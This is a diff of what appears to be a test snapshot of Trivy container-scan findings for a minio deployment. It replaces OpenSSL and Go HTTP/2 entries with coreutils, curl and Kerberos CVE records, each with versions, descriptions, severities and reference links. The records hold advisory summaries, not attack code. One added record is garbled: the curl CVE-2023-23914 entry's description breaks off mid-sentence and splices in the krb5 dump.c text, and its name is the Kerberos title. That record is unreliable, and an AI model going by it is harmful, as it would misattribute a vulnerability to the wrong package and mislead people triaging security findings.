"https://www.cve.org/CVERecord?id=CVE-2017-18018", ], }, "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", + "name": "coreutils: race condition vulnerability in chown and chgrp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "7.74.0-1.3+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-32221", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "curl", + "references": [ + "http://seclists.org/fulldisclosure/2023/Jan/19", + "http://seclists.org/fulldisclosure/2023/Jan/20", + "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "https://access.redhat.com/errata/RHSA-2023:0333", + "https://access.redhat.com/security/cve/CVE-2022-32221", + "https://bugzilla.redhat.com/2135411", + "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "https://curl.se/docs/CVE-2022-32221.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "https://errata.rockylinux.org/RLSA-2023:0333", + "https://hackerone.com/reports/1704017", + "https://linux.oracle.com/cve/CVE-2022-32221.html", + "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "https://security.gentoo.org/glsa/202212-01", + "https://security.netapp.com/advisory/ntap-20230110-0006/", + "https://security.netapp.com/advisory/ntap-20230208-0002/", + "https://support.apple.com/kb/HT213604", + "https://support.apple.com/kb/HT213605", + "https://ubuntu.com/security/notices/USN-5702-1", + "https://ubuntu.com/security/notices/USN-5702-2", + "https://ubuntu.com/security/notices/USN-5823-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "https://www.debian.org/security/2023/dsa-5330", + ], + }, + "category": "Vulnerability", + "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "POST following PUT confusion", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://avd.aquasec.com/nvd/cve-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "http://seclists.org/fulldisclosure/2023/Jan/19", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "http://seclists.org/fulldisclosure/2023/Jan/20", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://access.redhat.com/errata/RHSA-2023:0333", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://access.redhat.com/security/cve/CVE-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://bugzilla.redhat.com/2135411", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://curl.se/docs/CVE-2022-32221.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://errata.rockylinux.org/RLSA-2023:0333", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://hackerone.com/reports/1704017", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://security.gentoo.org/glsa/202212-01", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://support.apple.com/kb/HT213604", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://support.apple.com/kb/HT213605", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://ubuntu.com/security/notices/USN-5702-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://ubuntu.com/security/notices/USN-5702-2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://ubuntu.com/security/notices/USN-5823-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.debian.org/security/2023/dsa-5330", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-23914", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "curl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-23914", + "https://curl.se/docs/CVE-2023-23914.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", + "https://hackerone.com/reports/1813864", + "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", + "https://security.netapp.com/advisory/ntap-20230309-0006/", + "https://ubuntu.com/security/notices/USN-5891-1", + "https://www.cve.org/CVERecord?id=CVE-2023-23914", + ], + }, + "category": "Vulnerability", + "description": "A cleartext transmission of sensitive information vulnerability exists in curl n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "request smuggling", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": 